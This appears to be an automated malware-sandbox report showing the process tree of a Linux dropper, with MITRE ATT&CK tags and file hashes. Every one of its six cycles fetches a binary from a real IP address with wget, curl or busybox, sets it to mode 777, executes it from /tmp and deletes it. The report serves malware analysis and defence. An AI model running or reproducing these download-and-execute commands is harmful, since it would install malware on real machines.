/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1666
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1668
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1671
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1674
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1677
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1678
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Writes file to tmp directory
PID:1679
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1680
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:1681
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:1682
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1683
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1684
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Writes file to tmp directory
PID:1685
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1686
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:1687
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:1688
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1689
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1690
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Writes file to tmp directory
PID:1691
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1692
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:1693
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:1694
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1695
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1696
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Writes file to tmp directory
PID:1697
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1698
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:1699
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:1700
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1701
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97